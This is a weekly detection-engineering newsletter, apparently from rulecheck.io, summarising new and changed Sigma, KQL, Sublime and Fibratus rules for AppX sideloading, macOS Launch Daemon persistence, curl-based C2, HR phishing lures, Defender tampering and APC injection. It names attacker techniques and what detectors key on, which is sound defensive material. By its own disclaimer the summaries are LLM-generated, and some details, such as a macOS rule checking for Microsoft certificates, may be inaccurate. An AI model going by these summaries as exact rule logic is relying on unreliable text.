This week’s update highlights the most significant changes to detection rules from 4 of the 50+ monitored GitHub repositories. Between Dec 22 and Dec 29, 2025, contributors added 2 new rules and updated 6 existing ones.

Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.

Key Takeaways

• New and modified rules target application sideloading using AppX packages, a technique used by malware like BazarLoader. One rule detects staging in common user directories. A related rule for registration from uncommon paths was refined with exclusions to lower false positives. (SigmaHQ/sigma)

• A new KQL query hunts for suspicious macOS Launch Daemons created in /Library/LaunchDaemons/. The logic identifies persistence by checking for low global prevalence, file age, and invalid certificate signatures. (benscha/KQLAdvancedHunting)

🚀 Make updates from this digest operational →

All detection rules from this digest are available in our MISP and STIX/TAXII feeds ready for direct integration into your SIEM, TIP, or SOAR solution, boosting your automated threat detection and enriching your existing intel.

Explore the feeds

Table Of Contents

• Corporate repositories (2)

  • SigmaHQ/sigma (+1, ✎2)

  • sublime-security/sublime-rules (✎1)

• Personal repositories (2)

  • benscha/KQLAdvancedHunting (+1)

  • rabbitstack/fibratus (✎3)

• Feedback

• Disclaimer

• Powered by

Corporate repositories (2)

SigmaHQ/sigma (+1, ✎2)

+ New rules

A new rule detects application sideloading using AppX packages staged in common user directories like Temp, Downloads, or Public. This technique is associated with malware such as BazarLoader. The detection monitors Event ID 854 from the Microsoft-Windows-AppXDeploymentServer/Operational log. (AppX Located in Known Staging Directory Added to Deployment Pipeline)

✎ Modified rules

Detection for malicious AppX package registration was refined. The rule now has broader file path filtering and adds exclusions for legitimate WinGet and Windows Update installations, reducing false positives. (AppX Located in Uncommon Directory Added to Deployment Pipeline)

Detection for curl.exe specifying a custom User-Agent was expanded. The logic now includes both the short form ‘-H’ and long form ‘--header’ command-line flags, improving coverage for this C2 communication technique. (Curl Web Request With Potential Custom User-Agent)

sublime-security/sublime-rules (✎1)

✎ Modified rules

Detection of HR-themed phishing lures was broadened. The logic now inspects the subject.base field and includes additional keywords like ‘contract’ and ‘empl[o0]yment’. Coverage was also extended to include pptx attachments, and the ‘merit’ keyword was refined with a word boundary for more precise matching. (Attachment: Suspicious employee policy update document lure)

Personal repositories (2)

benscha/KQLAdvancedHunting (+1)

+ New rules

A new KQL hunting rule detects suspicious macOS Launch Daemons. The rule monitors file creation or modification in the /Library/LaunchDaemons/ directory, identifying threats by filtering for low global prevalence, file age over 90 days, and invalid or non-Microsoft certificates. (Hunting suspicious Daemons on macOS)

rabbitstack/fibratus (✎3)

✎ Modified rules

Two Fibratus rules detecting registry modifications for persistence and defense evasion were updated for schema compatibility. The change from the deprecated registry.value field to registry.data keeps detections for Startup folder path changes and Windows Defender tampering operational. (Windows Defender protection tampering via registry, Suspicious Startup shell folder modification)

Detection for DLL loading via Asynchronous Procedure Call (APC) is refined to reduce false positives. The rule now requires KernelBase.dll!Sleep* in the thread callstack, making the detection more specific to sleep obfuscation and process injection techniques that use APC from a sleep state. (DLL loaded via APC queue)

Feedback

Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we’d love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.

Disclaimer

The summaries in this brief are generated by LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

Powered by

This digest is built with BlackStork.

Looking for a customized version of this newsletter? We’d be happy to help — contact us.